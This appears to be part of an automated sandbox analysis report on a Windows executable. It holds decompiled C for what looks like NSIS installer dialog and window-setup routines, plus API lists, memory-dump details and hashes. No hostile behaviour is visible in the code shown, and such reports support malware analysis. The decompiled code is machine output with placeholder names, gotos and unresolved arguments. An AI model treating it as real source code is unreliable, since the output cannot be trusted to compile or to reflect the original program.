                                                  				signed int _t38;
                                                  				struct HWND__* _t48;
                                                  				signed int _t67;
                                                  				struct HWND__* _t73;
                                                  				signed int _t86;
                                                  				struct HWND__* _t91;
                                                  				signed int _t99;
                                                  				int _t103;
                                                  				signed int _t117;
                                                  				int _t118;
                                                  				int _t122;
                                                  				signed int _t124;
                                                  				struct HWND__* _t127;
                                                  				struct HWND__* _t128;
                                                  				int _t129;
                                                  				intOrPtr _t130;
                                                  				long _t133;
                                                  				int _t135;
                                                  				int _t136;
                                                  				void* _t137;
                                                  
                                                  				_t130 = _a8;
                                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                                  					_t34 = _a12;
                                                  					_t127 = _a4;
                                                  					__eflags = _t130 - 0x110;
                                                  					 *0x42d250 = _t34;
                                                  					if(_t130 == 0x110) {
                                                  						 *0x434f08 = _t127;
                                                  						 *0x42d264 = GetDlgItem(_t127, 1);
                                                  						_t91 = GetDlgItem(_t127, 2);
                                                  						_push(0xffffffff);
                                                  						_push(0x1c);
                                                  						 *0x42b230 = _t91;
                                                  						E00404499(_t127);
                                                  						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8); // executed
                                                  						 *0x433ecc = E0040140B(4);
                                                  						_t34 = 1;
                                                  						__eflags = 1;
                                                  						 *0x42d250 = 1;
                                                  					}
                                                  					_t124 =  *0x40a368; // 0x0
                                                  					_t136 = 0;
                                                  					_t133 = (_t124 << 6) +  *0x434f20;
                                                  					__eflags = _t124;
                                                  					if(_t124 < 0) {
                                                  						L36:
                                                  						E004044E5(0x40b);
                                                  						while(1) {
                                                  							_t36 =  *0x42d250;
                                                  							 *0x40a368 =  *0x40a368 + _t36;
                                                  							_t133 = _t133 + (_t36 << 6);
                                                  							_t38 =  *0x40a368; // 0x0
                                                  							__eflags = _t38 -  *0x434f24;
                                                  							if(_t38 ==  *0x434f24) {
                                                  								E0040140B(1);
                                                  							}
                                                  							__eflags =  *0x433ecc - _t136;
                                                  							if( *0x433ecc != _t136) {
                                                  								break;
                                                  							}
                                                  							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t117 =  *(_t133 + 0x14);
                                                  							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                  							_push(0xfffffc19);
                                                  							E00404499(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                  							_push(0xfffffc1b);
                                                  							E00404499(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                  							_push(0xfffffc1a);
                                                  							E00404499(_t127);
                                                  							_t48 = GetDlgItem(_t127, 3);
                                                  							__eflags =  *0x434f8c - _t136;
                                                  							_v28 = _t48;
                                                  							if( *0x434f8c != _t136) {
                                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                  								__eflags = _t117;
                                                  							}
                                                  							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                  							E004044BB(_t117 & 0x00000002);
                                                  							_t118 = _t117 & 0x00000004;
                                                  							EnableWindow( *0x42b230, _t118);
                                                  							__eflags = _t118 - _t136;
                                                  							if(_t118 == _t136) {
                                                  								_push(1);
                                                  							} else {
                                                  								_push(_t136);
                                                  							}
                                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                  							__eflags =  *0x434f8c - _t136;
                                                  							if( *0x434f8c == _t136) {
                                                  								_push( *0x42d264);
                                                  							} else {
                                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                                  								_push( *0x42b230);
                                                  							}
                                                  							E004044CE();
                                                  							E0040653D(0x42d268, E00403F7B());
                                                  							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                  							SetWindowTextW(_t127, 0x42d268); // executed
                                                  							_push(_t136);
                                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                  							__eflags = _t67;
                                                  							if(_t67 != 0) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags =  *_t133 - _t136;
                                                  								if( *_t133 == _t136) {
                                                  									continue;
                                                  								}
                                                  								__eflags =  *(_t133 + 4) - 5;
                                                  								if( *(_t133 + 4) != 5) {
                                                  									DestroyWindow( *0x433ed8); // executed
                                                  									 *0x42c240 = _t133;
                                                  									__eflags =  *_t133 - _t136;
                                                  									if( *_t133 <= _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                  									__eflags = _t73 - _t136;
                                                  									 *0x433ed8 = _t73;
                                                  									if(_t73 == _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                  									_push(6);
                                                  									E00404499(_t73);
                                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                  									ScreenToClient(_t127, _t137 + 0x10);
                                                  									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                  									_push(_t136);
                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                  									__eflags =  *0x433ecc - _t136;
                                                  									if( *0x433ecc != _t136) {
                                                  										goto L63;
                                                  									}
                                                  									ShowWindow( *0x433ed8, 8); // executed
                                                  									E004044E5(0x405);
                                                  									goto L60;
                                                  								}
                                                  								__eflags =  *0x434f8c - _t136;
                                                  								if( *0x434f8c != _t136) {
                                                  									goto L63;
                                                  								}
                                                  								__eflags =  *0x434f80 - _t136;
                                                  								if( *0x434f80 != _t136) {
                                                  									continue;
                                                  								}
                                                  								goto L63;
                                                  							}
                                                  						}
                                                  						DestroyWindow( *0x433ed8);
                                                  						 *0x434f08 = _t136;
                                                  						EndDialog(_t127,  *0x42ba38);
                                                  						goto L60;
                                                  					} else {
                                                  						__eflags = _t34 - 1;
                                                  						if(_t34 != 1) {
                                                  							L35:
                                                  							__eflags =  *_t133 - _t136;
                                                  							if( *_t133 == _t136) {
                                                  								goto L63;
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						_push(0);
                                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                  						__eflags = _t86;
                                                  						if(_t86 == 0) {
                                                  							goto L35;
                                                  						}
                                                  						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                  						__eflags =  *0x433ecc;
                                                  						return 0 |  *0x433ecc == 0x00000000;
                                                  					}
                                                  				} else {
                                                  					_t127 = _a4;
                                                  					_t136 = 0;
                                                  					if(_t130 == 0x47) {
                                                  						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                  					}
                                                  					_t122 = _a12;
                                                  					if(_t130 != 5) {
                                                  						L8:
                                                  						if(_t130 != 0x40d) {
                                                  							__eflags = _t130 - 0x11;
                                                  							if(_t130 != 0x11) {
                                                  								__eflags = _t130 - 0x111;
                                                  								if(_t130 != 0x111) {
                                                  									goto L28;
                                                  								}
                                                  								_t135 = _t122 & 0x0000ffff;
                                                  								_t128 = GetDlgItem(_t127, _t135);
                                                  								__eflags = _t128 - _t136;
                                                  								if(_t128 == _t136) {
                                                  									L15:
                                                  									__eflags = _t135 - 1;
                                                  									if(_t135 != 1) {
                                                  										__eflags = _t135 - 3;
                                                  										if(_t135 != 3) {
                                                  											_t129 = 2;
                                                  											__eflags = _t135 - _t129;
                                                  											if(_t135 != _t129) {
                                                  												L27:
                                                  												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                  												goto L28;
                                                  											}
                                                  											__eflags =  *0x434f8c - _t136;
                                                  											if( *0x434f8c == _t136) {
                                                  												_t99 = E0040140B(3);
                                                  												__eflags = _t99;
                                                  												if(_t99 != 0) {
                                                  													goto L28;
                                                  												}
                                                  												 *0x42ba38 = 1;
                                                  												L23:
                                                  												_push(0x78);
                                                  												L24:
                                                  												E00404472();
                                                  												goto L28;
                                                  											}
                                                  											E0040140B(_t129);
                                                  											 *0x42ba38 = _t129;
                                                  											goto L23;
                                                  										}
                                                  										__eflags =  *0x40a368 - _t136; // 0x0
                                                  										if(__eflags <= 0) {
                                                  											goto L27;
                                                  										}
                                                  										_push(0xffffffff);
                                                  										goto L24;
                                                  									}
                                                  									_push(_t135);
                                                  									goto L24;
                                                  								}
                                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                  								_t103 = IsWindowEnabled(_t128);
                                                  								__eflags = _t103;
                                                  								if(_t103 == 0) {
                                                  									L63:
                                                  									return 0;
                                                  								}
                                                  								goto L15;
                                                  							}
                                                  							SetWindowLongW(_t127, _t136, _t136);
                                                  							return 1;
                                                  						}
                                                  						DestroyWindow( *0x433ed8);
                                                  						 *0x433ed8 = _t122;
                                                  						L60:
                                                  						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                  							ShowWindow(_t127, 0xa); // executed
                                                  							 *0x42f268 = 1;
                                                  						}
                                                  						goto L63;
                                                  					} else {
                                                  						asm("sbb eax, eax");
                                                  						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                  						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                  							L28:
                                                  							return E00404500(_a8, _t122, _a16);
                                                  						} else {
                                                  							ShowWindow(_t127, 4);
                                                  							goto L8;
                                                  						}
                                                  					}
                                                  				}
                                                  			}































                                                  0x00403fa5
                                                  0x00403fac
                                                  0x00404113
                                                  0x00404117
                                                  0x0040411b
                                                  0x0040411d
                                                  0x00404122
                                                  0x0040412d
                                                  0x00404138
                                                  0x0040413d
                                                  0x0040413f
                                                  0x00404141
                                                  0x00404144
                                                  0x00404149
                                                  0x00404157
                                                  0x00404164
                                                  0x0040416b
                                                  0x0040416b
                                                  0x0040416c
                                                  0x0040416c
                                                  0x00404171
                                                  0x00404177
                                                  0x0040417e
                                                  0x00404184
                                                  0x00404186
                                                  0x004041c6
                                                  0x004041cb
                                                  0x004041d0
                                                  0x004041d0
                                                  0x004041d5
                                                  0x004041de
                                                  0x004041e0
                                                  0x004041e5
                                                  0x004041eb
                                                  0x004041ef
                                                  0x004041ef
                                                  0x004041f4
                                                  0x004041fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00404205
                                                  0x0040420b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404214
                                                  0x0040421c
                                                  0x00404221
                                                  0x00404224
                                                  0x0040422a
                                                  0x0040422f
                                                  0x00404232
                                                  0x00404238
                                                  0x0040423d
                                                  0x00404240
                                                  0x00404246
                                                  0x0040424e
                                                  0x00404254
                                                  0x0040425a
                                                  0x0040425e
                                                  0x00404265
                                                  0x00404265
                                                  0x00404265
                                                  0x0040426f
                                                  0x00404281
                                                  0x0040428d
                                                  0x00404292
                                                  0x0040429c
                                                  0x004042a2
                                                  0x004042a4
                                                  0x004042a9
                                                  0x004042a6
                                                  0x004042a6
                                                  0x004042a6
                                                  0x004042b9
                                                  0x004042d1
                                                  0x004042d3
                                                  0x004042d9
                                                  0x004042ee
                                                  0x004042db
                                                  0x004042e4
                                                  0x004042e6
                                                  0x004042e6
                                                  0x004042f4
                                                  0x00404305
                                                  0x0040431b
                                                  0x00404322
                                                  0x00404328
                                                  0x0040432c
                                                  0x00404331
                                                  0x00404333
                                                  0x00000000
                                                  0x00404339
                                                  0x00404339
                                                  0x0040433b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404341
                                                  0x00404345
                                                  0x0040436a
                                                  0x00404370
                                                  0x00404376
                                                  0x00404378
                                                  0x00000000
                                                  0x00000000
                                                  0x0040439e
                                                  0x004043a4
                                                  0x004043a6
                                                  0x004043ab
                                                  0x00000000
                                                  0x00000000
                                                  0x004043b1
                                                  0x004043b4
                                                  0x004043b7
                                                  0x004043ce
                                                  0x004043da
                                                  0x004043f3
                                                  0x004043f9
                                                  0x004043fd
                                                  0x00404402
                                                  0x00404408
                                                  0x00000000
                                                  0x00000000
                                                  0x00404412
                                                  0x0040441d
                                                  0x00000000
                                                  0x0040441d
                                                  0x00404347
                                                  0x0040434d
                                                  0x00000000
                                                  0x00000000
                                                  0x00404353
                                                  0x00404359
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040435f
                                                  0x00404333
                                                  0x0040442a
                                                  0x00404436
                                                  0x0040443d
                                                  0x00000000
                                                  0x00404188
                                                  0x00404188
                                                  0x0040418b
                                                  0x004041be
                                                  0x004041be
                                                  0x004041c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004041c0
                                                  0x0040418d
                                                  0x00404191
                                                  0x00404196
                                                  0x00404198
                                                  0x00000000
                                                  0x00000000
                                                  0x004041a8
                                                  0x004041b0
                                                  0x00000000
                                                  0x004041b6
                                                  0x00403fbe
                                                  0x00403fbe
                                                  0x00403fc2
                                                  0x00403fc7
                                                  0x00403fd6
                                                  0x00403fd6
                                                  0x00403fdc
                                                  0x00403fe3
                                                  0x00404027
                                                  0x0040402d
                                                  0x00404046
                                                  0x00404049
                                                  0x0040405c
                                                  0x00404062
                                                  0x00000000
                                                  0x00000000
                                                  0x00404068
                                                  0x00404073
                                                  0x00404075
                                                  0x00404077
                                                  0x00404096
                                                  0x00404096
                                                  0x00404099
                                                  0x0040409e
                                                  0x004040a1
                                                  0x004040b1
                                                  0x004040b2
                                                  0x004040b4
                                                  0x004040ea
                                                  0x004040fa
                                                  0x00000000
                                                  0x004040fa
                                                  0x004040b6
                                                  0x004040bc
                                                  0x004040d5
                                                  0x004040da
                                                  0x004040dc
                                                  0x00000000
                                                  0x00000000
                                                  0x004040de
                                                  0x004040ca
                                                  0x004040ca
                                                  0x004040cc
                                                  0x004040cc
                                                  0x00000000
                                                  0x004040cc
                                                  0x004040bf
                                                  0x004040c4
                                                  0x00000000
                                                  0x004040c4
                                                  0x004040a3
                                                  0x004040a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004040ab
                                                  0x00000000
                                                  0x004040ab
                                                  0x0040409b
                                                  0x00000000
                                                  0x0040409b
                                                  0x00404081
                                                  0x00404088
                                                  0x0040408e
                                                  0x00404090
                                                  0x00404466
                                                  0x00000000
                                                  0x00404466
                                                  0x00000000
                                                  0x00404090
                                                  0x0040404e
                                                  0x00000000
                                                  0x00404056
                                                  0x00404035
                                                  0x0040403b
                                                  0x00404443
                                                  0x00404449
                                                  0x00404456
                                                  0x0040445c
                                                  0x0040445c
                                                  0x00000000
                                                  0x00403fe5
                                                  0x00403fea
                                                  0x00403ff6
                                                  0x00403fff
                                                  0x00404100
                                                  0x00000000
                                                  0x0040401e
                                                  0x00404021
                                                  0x00000000
                                                  0x00404021
                                                  0x00403fff
                                                  0x00403fe3

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                  • ShowWindow.USER32(?), ref: 00403FF6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                  • ShowWindow.USER32(?,00000004), ref: 00404021
                                                  • DestroyWindow.USER32 ref: 00404035
                                                  • SetWindowLongW.USER32 ref: 0040404E
                                                  • GetDlgItem.USER32 ref: 0040406D
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                  • GetDlgItem.USER32 ref: 00404133
                                                  • GetDlgItem.USER32 ref: 0040413D
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404157
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                  • GetDlgItem.USER32 ref: 0040424E
                                                  • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                  • EnableWindow.USER32(?,?), ref: 0040429C
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                  • EnableMenuItem.USER32 ref: 004042B9
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 3618520773-0
                                                  • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                  • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                  • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                  • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 312 403c72-403c9b call 403ec2 call 405f14 304->312 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->312 319 403ca1-403ca6 312->319 320 403d2d-403d35 call 405f14 312->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 333 403cec-403cf8 lstrlenW 328->333 334 403cdc-403ce9 call 405e39 328->334 342 403df3-403df6 330->342 343 403dfb-403e06 call 403ec2 330->343 335 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->335 336 403eb8 331->336 340 403d20-403d28 call 405e0c call 40653d 333->340 341 403cfa-403d08 lstrcmpiW 333->341 334->333 335->330 339 403eba-403ec1 336->339 340->320 341->340 346 403d0a-403d14 GetFileAttributesW 341->346 342->339 354 403e0c-403e26 ShowWindow call 40689a 343->354 355 403e8f-403e90 call 405672 343->355 347 403d16-403d18 346->347 348 403d1a-403d1b call 405e58 346->348 347->340 347->348 348->340 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->336 361->342 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->342 367->368 372 403e84-403e8d call 403b3c 368->372 372->339
                                                  C-Code - Quality: 96%
                                                  			E00403BEC(void* __eflags) {
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void _v16;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t22;
                                                  				void* _t30;
                                                  				void* _t32;
                                                  				int _t33;
                                                  				void* _t36;
                                                  				int _t39;
                                                  				int _t40;
                                                  				int _t44;
                                                  				short _t63;
                                                  				WCHAR* _t65;
                                                  				signed char _t69;
                                                  				WCHAR* _t76;
                                                  				intOrPtr _t82;
                                                  				WCHAR* _t87;
                                                  
                                                  				_t82 =  *0x434f10;
                                                  				_t22 = E0040690A(2);
                                                  				_t90 = _t22;
                                                  				if(_t22 == 0) {
                                                  					_t76 = 0x42d268;
                                                  					L"1033" = 0x30;
                                                  					 *0x442002 = 0x78;
                                                  					 *0x442004 = 0;
                                                  					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                  					__eflags =  *0x42d268;
                                                  					if(__eflags == 0) {
                                                  						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                  					}
                                                  					lstrcatW(L"1033", _t76);
                                                  				} else {
                                                  					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                  				}
                                                  				E00403EC2(_t78, _t90);
                                                  				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Temp";
                                                  				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                  				 *0x434f9c = 0x10000;
                                                  				if(E00405F14(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                                  					L16:
                                                  					if(E00405F14(_t98, _t86) == 0) {
                                                  						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                  					}
                                                  					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                  					 *0x433ee8 = _t30;
                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                  						L21:
                                                  						if(E0040140B(0) == 0) {
                                                  							_t32 = E00403EC2(_t78, __eflags);
                                                  							__eflags =  *0x434fa0;
                                                  							if( *0x434fa0 != 0) {
                                                  								_t33 = E00405672(_t32, 0);
                                                  								__eflags = _t33;
                                                  								if(_t33 == 0) {
                                                  									E0040140B(1);
                                                  									goto L33;
                                                  								}
                                                  								__eflags =  *0x433ecc;
                                                  								if( *0x433ecc == 0) {
                                                  									E0040140B(2);
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							ShowWindow( *0x42d248, 5); // executed
                                                  							_t39 = E0040689A("RichEd20"); // executed
                                                  							__eflags = _t39;
                                                  							if(_t39 == 0) {
                                                  								E0040689A("RichEd32");
                                                  							}
                                                  							_t87 = L"RichEdit20W";
                                                  							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                  							__eflags = _t40;
                                                  							if(_t40 == 0) {
                                                  								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                  								 *0x433ec4 = _t87;
                                                  								RegisterClassW(0x433ea0);
                                                  							}
                                                  							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                  							E00403B3C(E0040140B(5), 1);
                                                  							return _t44;
                                                  						}
                                                  						L22:
                                                  						_t36 = 2;
                                                  						return _t36;
                                                  					} else {
                                                  						_t78 =  *0x434f00;
                                                  						 *0x433ea4 = E00401000;
                                                  						 *0x433eb0 =  *0x434f00;
                                                  						 *0x433eb4 = _t30;
                                                  						 *0x433ec4 = 0x40a380;
                                                  						if(RegisterClassW(0x433ea0) == 0) {
                                                  							L33:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                  						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_t78 =  *(_t82 + 0x48);
                                                  					_t92 = _t78;
                                                  					if(_t78 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					_t76 = 0x432ea0;
                                                  					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                  					_t63 =  *0x432ea0; // 0x43
                                                  					if(_t63 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					if(_t63 == 0x22) {
                                                  						_t76 = 0x432ea2;
                                                  						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                  					}
                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                  						L15:
                                                  						E0040653D(_t86, E00405E0C(_t76));
                                                  						goto L16;
                                                  					} else {
                                                  						_t69 = GetFileAttributesW(_t76);
                                                  						if(_t69 == 0xffffffff) {
                                                  							L14:
                                                  							E00405E58(_t76);
                                                  							goto L15;
                                                  						}
                                                  						_t98 = _t69 & 0x00000010;
                                                  						if((_t69 & 0x00000010) != 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}
























                                                  0x00403bf2
                                                  0x00403bfb
                                                  0x00403c02
                                                  0x00403c04
                                                  0x00403c18
                                                  0x00403c2a
                                                  0x00403c33
                                                  0x00403c3c
                                                  0x00403c43
                                                  0x00403c48
                                                  0x00403c4f
                                                  0x00403c62
                                                  0x00403c62
                                                  0x00403c6d
                                                  0x00403c06
                                                  0x00403c11
                                                  0x00403c11
                                                  0x00403c72
                                                  0x00403c7c
                                                  0x00403c85
                                                  0x00403c8a
                                                  0x00403c9b
                                                  0x00403d2d
                                                  0x00403d35
                                                  0x00403d3e
                                                  0x00403d3e
                                                  0x00403d54
                                                  0x00403d5a
                                                  0x00403d68
                                                  0x00403de9
                                                  0x00403df1
                                                  0x00403dfb
                                                  0x00403e00
                                                  0x00403e06
                                                  0x00403e90
                                                  0x00403e95
                                                  0x00403e97
                                                  0x00403eb3
                                                  0x00000000
                                                  0x00403eb3
                                                  0x00403e99
                                                  0x00403e9f
                                                  0x00403ea7
                                                  0x00403ea7
                                                  0x00000000
                                                  0x00403e9f
                                                  0x00403e14
                                                  0x00403e1f
                                                  0x00403e24
                                                  0x00403e26
                                                  0x00403e2d
                                                  0x00403e2d
                                                  0x00403e38
                                                  0x00403e40
                                                  0x00403e42
                                                  0x00403e44
                                                  0x00403e4d
                                                  0x00403e50
                                                  0x00403e56
                                                  0x00403e56
                                                  0x00403e75
                                                  0x00403e86
                                                  0x00000000
                                                  0x00403e8b
                                                  0x00403df3
                                                  0x00403df5
                                                  0x00000000
                                                  0x00403d6a
                                                  0x00403d6a
                                                  0x00403d76
                                                  0x00403d80
                                                  0x00403d86
                                                  0x00403d8b
                                                  0x00403d9a
                                                  0x00403eb8
                                                  0x00403eb8
                                                  0x00000000
                                                  0x00403eb8
                                                  0x00403da9
                                                  0x00403de4
                                                  0x00000000
                                                  0x00403de4
                                                  0x00403ca1
                                                  0x00403ca1
                                                  0x00403ca4
                                                  0x00403ca6
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cb4
                                                  0x00403cc6
                                                  0x00403ccb
                                                  0x00403cd4
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cda
                                                  0x00403cdc
                                                  0x00403ce9
                                                  0x00403ce9
                                                  0x00403cf2
                                                  0x00403cf8
                                                  0x00403d20
                                                  0x00403d28
                                                  0x00000000
                                                  0x00403d0a
                                                  0x00403d0b
                                                  0x00403d14
                                                  0x00403d1a
                                                  0x00403d1b
                                                  0x00000000
                                                  0x00403d1b
                                                  0x00403d16
                                                  0x00403d18
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d18
                                                  0x00403cf8

                                                  APIs
                                                    • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                    • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,7519FAA0), ref: 00403CED
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                  • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                  • LoadImageW.USER32 ref: 00403D54
                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                  • RegisterClassW.USER32 ref: 00403D91
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                  • CreateWindowExW.USER32 ref: 00403DDE
                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                  • GetClassInfoW.USER32 ref: 00403E40
                                                  • GetClassInfoW.USER32 ref: 00403E4D
